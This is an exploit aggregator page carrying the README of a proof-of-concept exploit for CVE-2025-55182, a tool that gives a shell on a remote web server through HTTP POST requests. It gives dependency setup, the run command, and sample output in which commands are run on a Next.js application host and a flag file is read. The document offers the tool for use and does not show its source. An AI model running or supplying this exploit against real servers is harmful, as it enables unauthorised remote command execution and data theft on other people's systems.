Share
## https://sploitus.com/exploit?id=A18D11D4-7153-5CF1-BE72-0C014A0FF7E9
# CVE-2025-55182

Proof of concept exploit for [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182).
When successful, it will emulate a shell on the remote target over HTTP-POST requests.
Works with both HTTP and HTTPS, but skips any certificate checks.
Only supports directory changes with absolute paths.

## How to use

1. Set up the dependencies.

```bash
# Install systemwide
pipx install requests

# Only install in current directory
python -m venv .
. bin/activate
pip install requests
```

2. Run the exploit.

```python
python3 ./CVE-2025-55182.py 'https://example.notatld:1337/'
```

## Example

When successfully run, the output should look something like this:

```
โ•ฐโ”€$ python CVE-2025-55182.py http://localhost:1337/
CVE-2025-55182 - PoC Shell
Author: B1TC0R3
Hint: Type 'exit' or 'quit' to exit.

/app/.next/standalone $> cd /app
/app $> ls
app
flag.txt
next-env.d.ts
next.config.mjs
node_modules
package-lock.json
package.json
postcss.config.mjs
public
tailwind.config.ts
tsconfig.json
/app $> cat flag.txt
EXAMPLE_TEST_FLAG
```